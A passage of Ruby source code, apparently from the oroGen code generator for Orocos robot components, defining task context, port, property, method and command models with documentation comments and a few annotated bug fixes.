    # User classes go through save_user (presumably preserving user
    # edits — see Generation.save_user for the exact policy)
    Generation.save_user "tasks", "#{basename}.cpp", code_cpp
    Generation.save_user "tasks", "#{basename}.hpp", code_hpp
    # Symlink the headers under <automatic_area>/<component_name>/ so
    # they can be included as <component_name/Task.hpp> before install
    fake_install_dir = File.join(component.base_dir, AUTOMATIC_AREA_NAME, component.name)
    FileUtils.mkdir_p fake_install_dir
    FileUtils.ln_sf File.join(component.base_dir, "tasks", "#{basename}.hpp"),
        File.join(fake_install_dir, "#{basename}.hpp")
    FileUtils.ln_sf File.join(component.base_dir, AUTOMATIC_AREA_NAME, "tasks", "#{basename}Base.hpp"),
        File.join(fake_install_dir, "#{basename}Base.hpp")
    self
end
# Generate a graphviz fragment (an HTML-label node) representing this
# task, listing its properties, input ports and output ports.
def to_dot
    # Escape HTML special characters so that C++ template type names
    # (e.g. std::vector<double>) do not break the HTML-like label.
    # BUG FIX: this lambda used to replace '<' by '<' and '>' by '>'
    # (a no-op); it must emit the &lt;/&gt; entities instead.
    html_escape = lambda { |s| s.gsub(/</, "&lt;").gsub(/>/, "&gt;") }
    # Renders a one-column bordered table with +title+ as header and
    # +lines+ joined by <BR/> as body
    html_table = lambda do |title, lines|
        label = "<TABLE BORDER=\"0\" CELLBORDER=\"1\" CELLSPACING=\"0\">\n"
        label << " <TR><TD>#{title}</TD></TR>\n"
        label << " <TR><TD>\n"
        label << lines.join("<BR/>\n")
        label << " </TD></TR>\n"
        label << "</TABLE>"
    end
    result = ""
    result << " node [shape=none,margin=0,height=.1];"
    label = ""
    label << "<TABLE BORDER=\"0\" CELLBORDER=\"0\" CELLSPACING=\"0\">\n"
    label << " <TR><TD>#{name}</TD></TR>"
    properties = all_properties.
        map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
    if !properties.empty?
        label << " <TR><TD>#{html_table["Properties", properties]}</TD></TR>"
    end
    input_ports = all_ports.
        find_all { |p| p.kind_of?(InputPort) }.
        map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
    if !input_ports.empty?
        label << " <TR><TD>#{html_table["Input ports", input_ports]}</TD></TR>"
    end
    output_ports = all_ports.
        find_all { |p| p.kind_of?(OutputPort) }.
        map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
    if !output_ports.empty?
        label << " <TR><TD>#{html_table["Output ports", output_ports]}</TD></TR>"
    end
    label << "</TABLE>"
    # The node is named after the Ruby object_id to guarantee
    # uniqueness within the generated graph
    result << " t#{object_id} [label=<#{label}>]"
    result
end
end
end
end
# fix #merge_ports_from
require 'utilrb/module/attr_predicate'
require 'utilrb/value_set'
module Orocos
# Checks that +type+ (a Typelib::Type subclass) is usable as a
# toplevel interface type (property, port, argument) and raises
# ArgumentError otherwise.
def self.validate_toplevel_type(type)
    if type < Typelib::ArrayType
        raise ArgumentError, "array types can be used only in a structure"
    elsif type < Typelib::NumericType && !Typelib::Registry.base_rtt_type?(type)
        # Numeric types are only allowed if RTT knows them natively
        raise ArgumentError, "#{type.name} cannot be used as a toplevel type"
    end
end
module Generation
# Mapping from the activity type symbols accepted by
# TaskContext#default_activity to the name of the corresponding RTT
# activity class. Frozen: it is a shared constant and must not be
# mutated by callers.
ACTIVITY_TYPES = {
    :fd_driven  => 'FileDescriptorActivity',
    :irq_driven => 'IRQActivity',
    :slave      => 'SlaveActivity',
    :periodic   => 'PeriodicActivity',
    :triggered  => 'NonPeriodicActivity',
    :sequential => 'SequentialActivity'
}.freeze
# Representation of a task context property (a configuration value
# exposed on the task's interface).
class Property
    # The task on which this property is attached
    attr_reader :task
    # The property name
    attr_reader :name
    # The property type, as a Typelib::Type object from the underlying
    # component's type registry
    attr_reader :type
    # The name of the type this property is using, for consistency with
    # the +type+ attribute
    def type_name; type.name end
    # The set of types used by this property (only its own type)
    def used_types; [type] end
    # The property's default value
    attr_reader :default_value
    # The property default value, formatted for as a C++ value
    def cxx_default_value
        if type < Typelib::EnumType
            # Enum symbols must be qualified with their enclosing C++
            # namespace (assumes default_value is the symbol name —
            # TODO confirm against the code generation templates)
            type.namespace('::') + default_value.to_s
        else
            # Ruby's #inspect yields a valid C++ literal for numbers
            # and strings
            default_value.inspect
        end
    end
    # Create a new property with the given name, type and default value
    #
    # Raises ArgumentError if +name+ is not a valid C++ identifier.
    def initialize(task, name, type, default_value)
        name = name.to_s
        if name !~ /^\w+$/
            raise ArgumentError, "property names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
        end
        type = task.component.find_type(type)
        Orocos.validate_toplevel_type(type)
        # BUG FIX: @task was never assigned even though attr_reader
        # :task is part of the public interface (it always returned
        # nil)
        @task, @name, @type, @default_value = task, name, type, default_value
    end
    def pretty_print(pp)
        pp.text "#{name}:#{type.name}"
        if doc
            pp.text ": #{doc}"
        end
    end
    # call-seq:
    #   doc new_doc -> self
    #   doc -> current_doc
    #
    # Gets/sets a string describing this object
    dsl_attribute(:doc) { |value| value.to_s }
end
# Generic representation of ports. The actual ports are either
# instance of InputPort or OutputPort
class Port
    # The port task
    attr_reader :task
    # The port name. May be a Regexp for dynamic port models (see
    # #initialize).
    attr_reader :name
    # The port type
    attr_reader :type
    # The port type name
    def type_name; type.name end
    # The set of types used by this port (only its own type)
    def used_types; [type] end
    # True if the component supports only static connections on this
    # port, and false otherwise
    #
    # See #static for more details.
    def static?; !!@static end
    # Declares that this port can be connected/disconnected only when
    # the component is in a non-running state.
    #
    # The default is that the port is dynamic, i.e. can be
    # connected/disconnected regardless of the component's state.
    #
    # See also #dynamic
    def static; @static = true end
    # Declares that this port can be connected/disconnected while the
    # component is running. It is the opposite of #static.
    #
    # This is the default
    def dynamic; @static = false end
    def pretty_print(pp)
        pp.text "[#{self.kind_of?(InputPort) ? "in" : "out"}]#{name}:#{type_name}"
    end
    # Creates a port named +name+ of the given +type+ on +task+.
    # +name+ may be a Regexp (used by dynamic port models); plain
    # names must be valid C++ identifiers.
    def initialize(task, name, type)
        if !name.kind_of?(Regexp)
            name = name.to_s
            if name !~ /^\w+$/
                raise ArgumentError, "port names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
            end
        end
        type = task.component.find_type(type)
        Orocos.validate_toplevel_type(type)
        if type.name == "/std/vector<double>"
            # Warn: this particular type cannot be logged
            Orocos::Generation.warn "#{type.name} is used as the port type for #{name}, logging it will not be possible"
        end
        @task, @name, @type = task, name, type
    end
    # call-seq:
    #   doc new_doc -> self
    #   doc -> current_doc
    #
    # Gets/sets a string describing this object
    dsl_attribute(:doc) { |value| value.to_s }
end
# Specification for an output port
class OutputPort < Port
    def initialize(*args)
        super
        # Defaults: one sample per cycle, written every cycle, no burst
        @sample_size  = 1
        @period = 1
        @burst_size   = nil
        @burst_period = nil
        @port_triggers = Set.new
    end
    # Returns the name of the Orocos class for this port (i.e. one of
    # ReadDataPort, WriteDataPort, DataPort, ReadBufferPort, ...)
    def orocos_class; "RTT::OutputPort" end
    # Maximal number of samples written at once during a burst (see
    # #burst); nil if no burst is declared
    attr_reader :burst_size
    # How often (in cycles) a burst can happen (see #burst)
    attr_reader :burst_period
    # call-seq:
    #   sample_size new_size -> self
    #   sample_size -> size
    #
    # Sets and gets the sample size, i.e. how many data samples are
    # pushed at once to this port.
    dsl_attribute(:sample_size) { |value| Integer(value) }
    # call-seq:
    #   period new_period -> self
    #   period -> current_period
    #
    # Sets the period for this output port, in cycles. The port period
    # should be the minimal amount of execution cycles (calls to
    # updateHook) between two updates of this port.
    #
    # See #sample_size and #burst for other parameters describing the
    # behaviour of this port.
    #
    # The default is one.
    dsl_attribute(:period) { |value| Integer(value) }
    # call-seq:
    #   burst count, period -> self
    #
    # Declares that a burst of data can occasionally be written to this
    # port. +count+ is the maximal number of samples that are pushed to
    # this port at once, and +period+ how often this burst can happen.
    #
    # If the period is set to 0, then it is assumed that the bursts
    # happen 'every once in a while', i.e. that it can be assumed that
    # the event is rare enough.
    #
    # The default is no burst
    def burst(size, period = 1)
        @burst_size   = Integer(size)
        @burst_period = Integer(period)
        self
    end
    # The set of input ports that will cause a write on this output
    attr_reader :port_triggers
    # call-seq:
    #   triggered_on input_port_name, input_port_name, ...
    #
    # Declares that this port will be written whenever a sample is
    # received on the given input ports. The default is to consider that
    # the port is written whenever updateHook() is called.
    #
    # You may want to call #triggered_on_update if the port will be
    # written for each call to updateHook too.
    def triggered_on(*input_ports)
        # Resolve the names into Port objects right away so that bad
        # names raise here
        @port_triggers |= input_ports.to_set.map { |name| task.port(name) }
        self
    end
    # call-seq:
    #   triggered_on_update
    #
    # Declares that this port will be written for each call of the
    # updateHook(). It is the default if #triggered_on has not been
    # called.
    def triggered_on_update
        @triggered_on_update = true
        self
    end
    # True if the port will be written for the calls to updateHook()
    # that are triggered by the activity.
    #
    # See #triggered_on_update and #triggered_on
    def triggered_on_update?
        if !@port_triggers.empty?
            # Port triggers are defined: updateHook writes only if
            # explicitly requested through #triggered_on_update
            !!@triggered_on_update
        else
            true
        end
    end
end
# Specification for an input port
class InputPort < Port
    # Returns the name of the Orocos class for this port (i.e. one of
    # ReadDataPort, WriteDataPort, DataPort, ReadBufferPort, ...)
    def orocos_class; "RTT::InputPort" end
    # The connection policy required by this port, either :data or
    # :buffer (see #needs_buffered_connection)
    attr_reader :required_connection_type
    def initialize(*args)
        super
        # Default: plain data connections
        @required_connection_type = :data
    end
    # True if connections to this port must use a buffered.
    # In general, it means that the task's code check the return value
    # of read(), as in
    #
    #   if (_input.read(value))
    #   {
    #       // data is available, do something
    #   }
    def needs_buffered_connection; @required_connection_type = :buffer; self end
    # True if connections to this port must use a data policy.
    #
    # This should not be useful in general
    def needs_data_connection; @required_connection_type = :data; self end
    # Returns true if the component requires connections to this port to
    # be reliable (i.e. non-lossy).
    #
    # See #needs_reliable_policy for more information
    def needs_reliable_connection?; @needs_reliable_connection end
    # Declares that the components requires a non-lossy policy
    #
    # This is different from #requires_buffered_connection as a data
    # policy could be used if the period of the connection's source is
    # much longer than the period of the connection's end (for
    # instance).
    def needs_reliable_connection; @needs_reliable_connection = true; self end
end
# Mixin for dynamic port models. A dynamic port model acts as a
# template: #instanciate produces a copy bound to a concrete name.
module DynamicPort
    # Returns a copy of this port model whose name is +name+
    def instanciate(name)
        instance = dup
        instance.instance_variable_set :@name, name
        instance
    end
    def pretty_print(pp)
        pp.text "[dyn,#{self.class < InputPort ? "in" : "out"}]#{name}:#{type_name}"
    end
end
# Specification for a dynamic output port.
#
# Dynamic ports are not statically present, but will be created at
# runtime. They are added by TaskContext#dynamic_output_port.
class DynamicOutputPort < OutputPort
    include DynamicPort
end
# Specification for a dynamic input port.
#
# Dynamic ports are not statically present, but will be created at
# runtime. They are added by TaskContext#dynamic_input_port.
class DynamicInputPort < InputPort
    include DynamicPort
end
# Base class for methods and commands
class Callable
    # The TaskContext instance this method is part of
    attr_reader :task
    # The method name
    attr_reader :name
    # Creates a callable named +name+ on +task+. +name+ must be a
    # valid C++ identifier.
    def initialize(task, name)
        name = name.to_s
        if name !~ /^\w+$/
            raise ArgumentError, "#{self.class.name.downcase} names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
        end
        @task = task
        @name = name
        @arguments = []
    end
    # call-seq:
    #   doc new_doc -> self
    #   doc -> current_doc
    #
    # Gets/sets a string describing this object
    dsl_attribute(:doc) { |value| value.to_s }
    # The set of arguments of this method, as an array of [name, type,
    # doc] elements. The +type+ objects are Typelib::Type instances.
    #
    # See #argument
    attr_reader :arguments
    # Defines the next argument of this method. +name+ is the argument
    # name and +type+ is either the type name as a string, or a
    # Typelib::Type object. In both cases, the required type must be
    # defined in the component, either because it is part of its own
    # toolkit or because it has been imported by a
    # Component#load_toolkit call.
    #
    # Note that Orocos::RTT does not support having more than 4
    # arguments for a method, and trying that will therefore raise an
    # error
    def argument(name, type, doc = "")
        if arguments.size == 4
            raise ArgumentError, "Orocos does not support having more than 4 arguments for a method"
        end
        type = task.component.find_type(type)
        Orocos.validate_toplevel_type(type)
        arguments << [name, type, doc]
        self
    end
    # Returns the set of types that this method/command uses, as a
    # ValueSet of Typelib::Type classes.
    def used_types
        arguments.map { |_, t, _| t }
    end
    # Returns the argument part of the C++ signature for this callable,
    # e.g. "(double const & x, int y)". Non-numeric types are passed
    # by const reference.
    def argument_signature(with_names = true)
        arglist = arguments.map do |name, type, doc|
            arg = type.full_name('::', true)
            if !(type < Typelib::NumericType)
                arg += " const &"
            end
            if with_names then "#{arg} #{name}"
            else arg
            end
        end
        "(" << arglist.join(", ") << ")"
    end
end
# Representation of a RTT method. Instances of this object are usually
# created through TaskContext#method. The generated code will expect
# the class implementation (user-visible part) to define one method, to
# serve the call, with almost the same name that the method itself.
#
# For instance, the following definition
#   method('MyMethod')
#
# will require the user-visible part to define
#   [return value] myMethod([arguments]);
#
# (note that the first character of the method name has been set to
# lowercase to generate the C++ method name)
#
# The argument list of the C++ method (the first one) can be defined
# using Callable#argument. Its return type by using #returns. The
# default method signature is no return type (i.e. void) and no
# arguments.
#
# The name of the work and completion methods can be changed with
# #method_name.
#
# For instance,
#   method('MyMethod').
#       argument('x', 'double', 'the target X value').
#       argument('y', 'double', 'the target Y value').
#       method_name('move').
#       returns('double')
#
# will require the user-visible part to define
#   double move(double x, double y);
class Method < Callable
    def initialize(task, name)
        super
        # Default C++ method name: same as the orocos name, with the
        # first character lowercased (mutated in place)
        @method_name = self.name.dup
        method_name[0, 1] = method_name[0, 1].downcase
    end
    def used_types # :nodoc:
        [return_type].compact + super
    end
    # The return type of this method, as a Typelib::Type object.
    # See #returns
    attr_reader :return_type
    # Sets the return type for this method. +type+ can either be the
    # type name or a Typelib::Type object. In both cases, the required
    # type must be defined in the component, either because it is part
    # of its own toolkit or because it has been imported by a
    # Component#load_toolkit call.
    def returns(type)
        if type
            type = task.component.find_type(type)
            Orocos.validate_toplevel_type(type)
        end
        @return_type = type
        self
    end
    # Returns the C++ signature for this method. Used in code
    # generation only.
    def signature(with_names = true)
        result = ""
        if return_type
            result << return_type.full_name('::', true)
        else
            result << "void"
        end
        if with_names
            result << " " <<
                if block_given? then yield
                else method_name
                end
        end
        result << argument_signature(with_names)
    end
    def pretty_print(pp)
        pp.text signature(true)
    end
    # call-seq:
    #   method_name new_name -> self
    #   method_name -> current_name
    #
    # Gets or sets the name of the C++ method which is to be called to
    # serve this orocos method. It default to the method name with the
    # first character set to lowercase (MyMethod becomes myMethod).
    dsl_attribute(:method_name) { |value| value.to_s }
end
# Representation of a RTT command. Instances of this object are usually
# created through TaskContext#command. The generated code will expect
# the class implementation (user-visible part) to define two methods:
# * a _work_ method which is called once when the command is called. This
#   method has a boolean return type and should return true if the command
#   started, and false otherwise.
# * a _completion_ method which is called while the command is running.
#   This method should return true when the command is finished and false
#   otherwise.
#
# For instance, the following definition
#   command('MyCommand')
#
# will require the user-visible part to define
#   bool myCommand([arguments]);
#   bool isMyCommandCompleted([arguments]);
#
# (note that the first character of the command name has been set to
# lowercase for the work-method name)
#
# The argument list of the work method (the first one) can be defined
# using Callable#argument. For the completion method, three choices are
# available:
# * no arguments at all
# * the same first argument that the work method
# * all the same arguments than the work method
#
# The default is to have all arguments. This can be changed using
# #completion_no_arguments, #completion_first_argument and
# #completion_all_arguments.
#
# The name of the work and completion methods can be changed with
# #work_method_name and #completion_method_name.
#
# For instance,
#   command('my_command').
#       argument('x', 'double', 'the target X value').
#       argument('y', 'double', 'the target Y value').
#       work_method_name('move').
#       completion_method_name('hasReachedTarget').
#       completion_no_arguments.
#
# will require the user-visible part to define
#   bool move(double x, double y);
#   bool hasReachedTarget();
class Command < Callable
    # The C++ method name to be called to serve this Orocos command.
    # This defaults to +name+, but you can customize it by using
    # #method_name
    dsl_attribute(:work_method_name) { |name| name.to_s }
    # The C++ method name to be called to serve this Orocos command.
    # This defaults to is+name+Completed, but you can customize it by
    # using #method_name
    dsl_attribute(:completion_method_name) { |name| name.to_s }
    # Create a new callable object on the specified task and with the
    # specified name. The setup of the callable should be done by
    # calling the various setup methods after the object has been
    # created.
    def initialize(task, name)
        super
        # Default work method name: command name with the first
        # character lowercased (mutated in place)
        @work_method_name = self.name.dup
        work_method_name[0, 1] = work_method_name[0, 1].downcase
        @completion_method_name = "is#{name}Completed"
        # Default: the completion method takes all the work method's
        # arguments
        @completion_signature_type = :all_arguments
    end
    # Which kind of signature do we want for the completion method ?
    # It is either +:no_arguments+, +:first_argument+ or +:all_arguments+
    # Use #completion_no_arguments, #completion_first_argument or #completion_all_arguments
    # to change it
    attr_reader :completion_signature_type
    # The completion method for this command has no argument at all
    def completion_no_arguments; @completion_signature_type = :no_arguments end
    # The completion method for this command will be given the same
    # first argument than the command method
    def completion_first_argument; @completion_signature_type = :first_argument end
    # The completion method for this command will be given the same
    # arguments than the command method
    def completion_all_arguments; @completion_signature_type = :all_arguments end
    # A string representing the signature for the C++ work method. If
    # +with_names+ is true, the name of the method and the names of the
    # arguments are included in the string.
    def work_signature(with_names = true)
        result = "bool"
        if with_names
            result << " " <<
                if block_given? then yield
                else work_method_name
                end
        end
        result << argument_signature(with_names)
    end
    # A string representing the signature for the C++ completion
    # method. If +with_names+ is true, the name of the method and the
    # names of the arguments are included in the string.
    #
    # The result depends on the completion_signature_type attribute,
    # which can be changed by the completion_no_arguments,
    # completion_first_argument and completion_all_arguments methods.
    def completion_signature(with_names = true)
        result = "bool"
        if with_names
            result << " " <<
                if block_given? then yield
                else completion_method_name
                end
        end
        result << case completion_signature_type
        when :no_arguments then "()"
        when :first_argument
            # Strip everything after the first argument
            argument_signature(with_names).gsub(/,.*\)$/, ")")
        when :all_arguments; argument_signature(with_names)
        end
        result
    end
    def pretty_print(pp) # :nodoc:
        pp.text work_signature(true)
        pp.breakable
        pp.text completion_signature(true)
    end
end
# Representation of TaskContext classes. This is usually created using
# Component#task_context.
#
# In the generated code, two classes are actually generated:
# * the auto-generated code is in <tt>.orogen/tasks/[name]Base.cpp</tt>
# and <tt>.orogen/tasks/[name]Base.hpp</tt>. These files define the
# various attributes related to the task context (i.e. port and
# attribute objects) in an <tt>[component.name]::[name]Base</tt> class.
# * the user-visible code is in <tt>tasks/[name].cpp</tt> and
# <tt>tasks/[name].hpp</tt>. These files are the ones that define the
# <tt>[component.name]::[name]</tt> class, which is a direct subclass
# of the <tt>[component.name]::[name]Base</tt> class.
#
# By default, the +Base+ class derives from the
# <tt>RTT::TaskContext</tt> class. This can be changed by using the
# #subclasses method.
#
# For all task context objects (ports, properties, ...) there is one
# attribute, of the right RTT class, added to the generated TaskContext
# subclass. The attribute name is always the _[object name], so for
# instance the presence of the following statement
# output_port('time', 'double')
#
# will cause a <tt>OutputPort<double></tt> attribute named
# <tt>_time</tt> to be added to the generated class (more specifically,
# to the +Base+ subclass).
class TaskContext
# The component this task is part of
attr_reader :component
# The task name
attr_reader :name
# The subclass of TaskContext which should be used to define this
# class. Set in #initialize and changed by #subclasses.
attr_reader :superclass
# A set of classes the TaskContext has to implement as well, as
# [class_name, include_file] pairs. Filled by #implements.
attr_reader :implemented_classes
# A set of Port objects that can be created at runtime
attr_reader :dynamic_ports
# Metaprogramming helper: for a set attribute +attribute_name+,
# defines
# * all_NAME: inherited + own elements, as an array
# * self_NAME: own elements only
# * each_NAME: enumeration that walks up the superclass chain first
#   (unless only_self is true); returns an enumerator if no block is
#   given
def self.enumerate_inherited_set(each_name, attribute_name = each_name) # :nodoc:
    class_eval <<-EOD
    def all_#{attribute_name}; each_#{each_name}.to_a end
    def self_#{attribute_name}; @#{attribute_name} end
    def each_#{each_name}(only_self = false, &block)
        if block_given?
            if !only_self && superclass
                superclass.each_#{each_name}(false, &block)
            end
            @#{attribute_name}.each(&block)
        else
            enum_for(:each_#{each_name}, only_self)
        end
    end
    EOD
end
def to_s; "#<#<Orocos::Generation::TaskContext>: #{name}>" end
# Call to declare that this task model is not meant to run in
# practice
def abstract; @abstract = true; end
# True if this task model is only meant to declare an interface, and
# should not be deployed
def abstract?; @abstract end
# Declares that this task context is a subclass of the following
# TaskContext class. +task_context+ can either be a class name or a
# TaskContext instance. In both cases, it must be defined in the
# scope of the enclosing Component object -- i.e. either defined in
# it, or imported by a Component#using_task_library call.
def subclasses(task_context)
    @superclass = component.find_task_context task_context
    unless superclass
        raise ArgumentError, "no such task context #{task_context}"
    end
end
# Declares that this task context is also a subclass of the
# following class. +name+ does not have to be a task context class.
# +include_file+ optionally names the header declaring that class.
def implements(name, include_file = nil)
    @implemented_classes << [name, include_file]
end
# True if the task context implements a parent class which matches
# +name+. +name+ can either be a string or a regular expression.
def implements?(name)
    return true if class_name == name
    return true if superclass && superclass.implements?(name)
    @implemented_classes.any? { |implemented_name, _| name === implemented_name }
end
##
# :method: required_activity?
#
# True if the current value of default_activity is actually
# required by the task context implementation
attr_predicate :required_activity?, true
##
# :method: required_activity
# :call-seq:
#   required_activity 'activity_type', *args
#
# The kind of activity that must be used for this task context. This
# is the name of the corresponding method on the deployment objects.
# See ACTIVITY_TYPES for the list of known activity types.
#
# See also #default_activity
dsl_attribute :required_activity do |type, *args|
    if respond_to?(type.to_sym)
        send(type.to_sym)
    else
        default_activity type, *args
    end
    # NOTE(review): the block's last expression is what dsl_attribute
    # stores as the attribute value — confirm that storing the result
    # of this assignment (true) is intended
    self.required_activity = true
end
##
# :method: default_activity
# :call-seq:
#   default_activity 'activity_type', *args
#
# The kind of activity that should be used by default. This is the
# name of the corresponding method on the deployment objects
# (:periodic, :aperiodic, :slave, :irq_driven, :fd_driven)
#
# This is a default value, i.e. the use of such an activity
# is not mandatory. If #required_activity is set to true, then
# this activity is the only kind of activity that can be used
# with this task context.
#
# See also #required_activity
dsl_attribute :default_activity do |type, *args|
    # A required activity cannot be overridden once set
    if required_activity? && @default_activity
        raise ArgumentError, "the #{default_activity[0]} activity is required, you cannot change it"
    end
    type = type.to_sym
    if !ACTIVITY_TYPES.has_key?(type)
        raise ArgumentError, "#{type} is not a valid activity type"
    end
    # Stored value: [type_symbol, *activity_arguments]
    [type, *args]
end
# True if this task context is defined by one of our dependencies.
attr_predicate :external_definition?, true
# The name of the header file containing the C++ code which defines
# this task context
def header_file
    if external_definition?
        # Externally-defined tasks live under their own library's
        # include directory
        library_name, task_name = self.name.split("::")
        "#{library_name.downcase}/#{task_name}.hpp"
    else
        "#{component.name.downcase}/#{basename}.hpp"
    end
end
# Returns the name without an eventual library name, e.g. "Task" for
# "Lib::Task" and "Task" for a plain "Task".
def basename
    library_name, task_name = self.name.split("::")
    task_name || library_name
end
# True if we are generating for Linux
def linux?; component.linux? end
# True if we are generating for Xenomai
def xenomai?; component.xenomai? end
# The name of the C++ class generated for this task context (same as
# #name)
def class_name
    name
end
# Create a new task context in the given component and with
# the given name. If a block is given, it is evaluated
# in the context of the newly created TaskContext object.
#
# TaskContext objects should not be created directly. You should
# use Component#task_context for that.
#
# Raises ArgumentError if +name+ clashes with the component name or
# is not a valid (possibly namespaced) C++ identifier.
def initialize(component, name)
    if name == component.name
        raise ArgumentError, "tasks and projects must not have the same name"
    elsif name !~ /^(\w+::)*\w+$/
        raise ArgumentError, "task names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
    end
    @component  = component
    @superclass = component.default_task_superclass
    @implemented_classes = []
    @name = name
    # This is an array, as we don't want to have it reordered
    # unnecessarily
    @states = Array.new
    # Default activity: non-periodic, triggered
    default_activity 'triggered'
    @properties = Array.new
    @methods    = Array.new
    @commands   = Array.new
    @ports      = Array.new
    @dynamic_ports = Array.new
    @event_ports = Array.new
    @initial_state = 'Stopped'
    @fixed_initial_state = false
    @needs_configuration = false
end
# Pretty-prints one section of the interface (+name+ is the section
# title, +set+ its elements). Prints "No <name>" when the section is
# empty, and always terminates with a breakable.
def pretty_print_interface(pp, name, set)
    if set.empty?
        pp.text "No #{name.downcase}"
        pp.breakable
        return
    end
    pp.text name
    pp.nest(2) do
        set.each do |element|
            pp.breakable
            element.pretty_print(pp)
        end
    end
    pp.breakable
end
# Pretty-prints the complete task interface: ports (static and
# dynamic), properties, methods and commands.
def pretty_print(pp)
    pp.text "------- #{name} ------"
    pp.breakable
    ports = each_port.to_a + each_dynamic_port.to_a
    pretty_print_interface(pp, "Ports", ports)
    pretty_print_interface(pp, "Properties", each_property.to_a)
    pretty_print_interface(pp, "Methods", each_method.to_a)
    pretty_print_interface(pp, "Commands", each_command.to_a)
end
# Returns the object in +set_name+ (:ports, :properties, ...) for
# which #name returns +name+, or raises ArgumentError if there is
# none
def get_object(set_name, name)
    candidates = send("all_#{set_name}")
    match = candidates.find { |obj| obj.name == name }
    unless match
        raise ArgumentError, "there is no #{name} in #{set_name}"
    end
    match
end
# Raises ArgumentError if an object named +name+ is already present
# in the set attribute +set_name+.
#
# This is an internal helper method
def check_uniqueness(set_name, name) # :nodoc:
    # Check if that name is a method name in orocos.rb as well ...
    # To warn about name clashes
    if @orocos_rb.nil?
        # Lazily probe once whether orocos.rb is installed; remember
        # the result (tri-state: nil = not probed yet)
        begin
            require 'orocos'
            @orocos_rb = true
        rescue LoadError
            @orocos_rb = false
        end
    end
    if name.to_str != 'state' && @orocos_rb && !component.kind_of?(ImportedProject)
        if Orocos::TaskContext.instance_methods.find { |n| n.to_s == name.to_str }
            STDERR.puts "WARN: #{name} is a method name used in orocos.rb"
            STDERR.puts "WARN: if you keep that name, you will not be able to use shortcut access in orocos.rb"
            STDERR.puts "WARN: for instance, for a property, you will have to do"
            STDERR.puts "WARN:    my_task.property('#{name}').write(new_value)"
            STDERR.puts "WARN: instead of the shorter and clearer"
            STDERR.puts "WARN:    my_task.#{name} = new_value"
        end
    end
    set = send("all_#{set_name}")
    if set.find { |o| o.name == name }
        raise ArgumentError, "there is already a #{name} in #{set_name}"
    end
end
private :check_uniqueness
# Add in +self+ the ports of +other_model+ that don't exist.
#
# Raises ArgumentError if +other_model+ has ports whose name is used
# in +self+, but for which the definition (class or type) is
# different.
def merge_ports_from(other_model)
    other_model.each_port do |p|
        self_port =
            begin
                port(p.name)
            rescue ArgumentError
                # No port with this name yet: it can be imported as-is
                nil
            end
        if self_port
            # BUG FIX: this mismatch error used to be raised inside
            # the begin/rescue block above, so it was swallowed by the
            # rescue clause and the conflicting port was silently
            # duplicated instead of reported
            if self_port.class != p.class || self_port.type != p.type
                raise ArgumentError, "cannot merge as the output port #{self_port.name} have different meanings"
            end
        else
            @ports << p
        end
    end
end
# If true, then the initial state of this class cannot be specified.
# For orogen-declared tasks, it is the same as
# #needs_configuration?. This mechanism is here for classes that
# have not been generated by orogen and either have a no way to
# specify the initial state, or a non-standard one.
#
# The flag is inherited: it is set if any superclass has it set.
def fixed_initial_state?; @fixed_initial_state || needs_configuration? || (superclass.fixed_initial_state? if superclass) end
# Declares that the initial state of this class cannot be specified.
# For orogen-declared tasks, it is the same as
# #needs_configuration?. This mechanism is here for classes that
# have not been generated by orogen and either have a no way to
# specify the initial state, or a non-standard one.
def fixed_initial_state; @fixed_initial_state = true end
# If true, the task context will start in the PreOperational state,
# and will not be able to run until configure() has been called and
# returned true.
#
# When subclassing, it is NOT possible to have a subclass starting
# in the Stopped state while its superclass starts from
# PreOperational.
#
# Inherited: true if any superclass needs configuration.
def needs_configuration?; @needs_configuration || (superclass.needs_configuration? if superclass) end
# Declares that this task needs to be configured before it is
# started (i.e. its initial state will be PreOperational instead of
# Stopped).
#
# If #fixed_initial_state? returns true, then this method raises
# ArgumentError. This is done so that it is possible to declare
# that some task contexts's implementation require the initial
# state to be either PreOperational or Stopped.
def needs_configuration
    # A superclass with a fixed initial state forbids any change
    if superclass && superclass.fixed_initial_state?
        raise ArgumentError, "cannot change the start state of this task context: the superclass #{superclass.name} does not allow it"
    end
    # A locally fixed initial state forbids it too, unless we already
    # need configuration anyway
    if fixed_initial_state? && !needs_configuration?
        raise ArgumentError, "cannot change the start state of this task context: #fixed_initial_state has been specified for it"
    end
    @needs_configuration = true
end
# Create a new property with the given name, type and default value
# for this task. This returns the Property instance representing
# the new property, whose methods can be used to configure the
# property further. +type+ is the type name for that attribute. It
# can be either in Typelib notation (/std/string) or in C++
# notation (std::string). This type must be defined either by the
# component's own toolkit, or by toolkits imported with
# Component#load_toolkit.
#
# The generated task context will have a <tt>_[property name]</tt>
# attribute of class RTT::Property<type>.
#
# For instance, the following definition
#   property('device_name', '/std/string', '').
#       doc 'the device name to connect to'
#
# Will generate a task context with a <tt>_device_name</tt>
# attribute of type RTT::Property<std::string>.
def property(name, type, default_value = nil)
  # Raises ArgumentError if a property with that name already exists
  check_uniqueness :properties, name
  # Resolve the type name into the corresponding Typelib type object
  type = component.find_type(type)
  @properties << Property.new(self, name, type, default_value)
  @properties.last
end
# Asks orogen to implement the extended state support interface in
# the Base class. This adds:
# * a 'state' output port in which the current task's state is written
# * an enumeration type named CLASS_NAME_STATES in which one value
#   is defined for each states
#
# Note that, for all of this to work, it is actually required that
# all the hooks overloaded in the task's class call their parent in
# the call chain.
#
# Raises ArgumentError if a conflicting 'state' port already exists.
def extended_state_support
  state_port = each_port.find { |p| p.name == "state" }
  if state_port
    if state_port.kind_of?(InputPort)
      raise ArgumentError,
        "there is already an input port called 'state', cannot enable extended state support"
    elsif state_port.type_name != "/int"
      # BUGFIX: this used state_port.typename (NoMethodError, the
      # accessor is type_name) and left the parenthesis unclosed
      raise ArgumentError,
        "there is already an output port called 'state', but it is not of type 'int' (found #{state_port.type_name})"
    end
  else
    output_port 'state', '/int'
  end

  # Force toolkit generation. The toolkit code will take care of
  # generating the state enumeration type for us
  component.toolkit(true)

  @extended_state_support = true
end
# True if the extended state support is enabled, either directly on
# this model or on one of its superclasses.
def extended_state_support?
  return true if @extended_state_support
  superclass.extended_state_support? if superclass
end
# Returns true if the given state name is already used, either on
